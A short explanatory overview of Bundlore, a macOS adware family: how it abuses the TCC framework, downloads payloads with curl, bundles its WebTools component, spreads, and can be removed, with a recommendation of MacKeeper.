Bundlore

Bundlore is a type of malware that has been particularly active and on the rise since 2019, specifically targeting macOS systems. It is designed to manipulate the Transparency Consent and Control (TCC) framework, a security feature in macOS, which it shares with other notable malware tools such as BlueBlood, Callisto, JokerSpy, XCSSET, and others recorded on VirusTotal. Bundlore, along with other adware families like CoinTicker and Shlayer, uses the built-in utility 'curl' to download its payload onto the targeted system. The malware is often propagated through suspicious downloads, emails, or websites, infecting systems without users' knowledge. In the most recent versions, Bundlore incorporates a component known as WebTools, which bypasses macOS security measures, alters browser behavior, achieves persistence, and installs an ad delivery component. This version has consolidated the functionality into a single application, instead of multiple binaries and bash scripts used in previous iterations. Despite macOS's robust security mechanisms, Bundlore has developed methods to circumvent these protections, posing a significant threat to the integrity of infected systems. To combat Bundlore infections, users are advised to employ reliable anti-malware solutions. One such solution is MacKeeper, which has been confirmed to effectively remove Bundlore components, excluding any System Integrity Protection (SIP)-protected files due to the nature of such protection. However, if a system is suspected to be infected with Bundlore, further research can be conducted using a list of Indicators of Compromise (IoCs), helping to identify and eliminate the threat.